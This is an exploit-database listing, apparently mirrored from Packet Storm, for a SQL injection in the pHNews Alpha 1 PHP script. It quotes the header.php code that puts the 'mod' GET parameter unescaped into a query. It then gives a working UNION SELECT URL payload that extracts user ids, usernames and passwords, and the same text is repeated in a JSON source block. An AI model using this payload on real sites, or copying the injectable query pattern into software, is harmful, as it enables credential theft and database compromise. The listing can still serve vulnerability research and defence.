Search...

pHNews Alpha 1 SQL Injection

2009-02-17T00:00:00

ID PACKETSTORM:74996
Type packetstorm
Reporter X0r
Modified 2009-02-17T00:00:00

Description

                                        
                                            `#########################################################################################  
[0x01] Informations:  
  
Name : pHNews Alpha 1  
Download : http://www.hotscripts.com/listings/jump/download/50111/  
Vulnerability : Sql Injection  
Author : x0r  
Contact : andry2000@hotmail.it  
Notes : Proud to be Italian   
#########################################################################################  
[0x02] Bug:  
  
Bugged file is /[path]/header.php   
  
[Code]  
$mod = $_GET["mod"];  
// If no mod is selected select the default (news)  
if ($mod == "") { $mod = "news"; }  
if ($mod != "nomod") {  
  
// Subit the query... god soooo mmmuuuccchhh coooodeee  
$query = "SELECT * FROM Modules WHERE name = '{$mod}'";  
$result = mysql_query($query) or die('Query failed: ' . mysql_error());  
[/code]  
  
  
#########################################################################################  
[0x03] Exploit:  
  
Exploit: http://victim.org/header.php?mod=' union select  
0,0,0,concat(id,char(45),UName,char(45),Paswd),0,0 from Users--  
########################################################################################  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:74996", "type": "packetstorm", "bulletinFamily": "exploit", "title": "pHNews Alpha 1 SQL Injection", "description": "", "published": "2009-02-17T00:00:00", "modified": "2009-02-17T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/74996/pHNews-Alpha-1-SQL-Injection.html", "reporter": "X0r", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:19:03", "viewCount": 1, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2016-11-03T10:19:03", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:19:03", "rev": 2}, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/74996/phnews-sql.txt", "sourceData": "`######################################################################################### \n[0x01] Informations: \n \nName : pHNews Alpha 1 \nDownload : http://www.hotscripts.com/listings/jump/download/50111/ \nVulnerability : Sql Injection \nAuthor : x0r \nContact : andry2000@hotmail.it \nNotes : Proud to be Italian \n######################################################################################### \n[0x02] Bug: \n \nBugged file is /[path]/header.php \n \n[Code] \n$mod = $_GET[\"mod\"]; \n// If no mod is selected select the default (news) \nif ($mod == \"\") { $mod = \"news\"; } \nif ($mod != \"nomod\") { \n \n// Subit the query... god soooo mmmuuuccchhh coooodeee \n$query = \"SELECT * FROM Modules WHERE name = '{$mod}'\"; \n$result = mysql_query($query) or die('Query failed: ' . mysql_error()); \n[/code] \n \n \n######################################################################################### \n[0x03] Exploit: \n \nExploit: http://victim.org/header.php?mod=' union select \n0,0,0,concat(id,char(45),UName,char(45),Paswd),0,0 from Users-- \n######################################################################################## \n \n \n`\n"}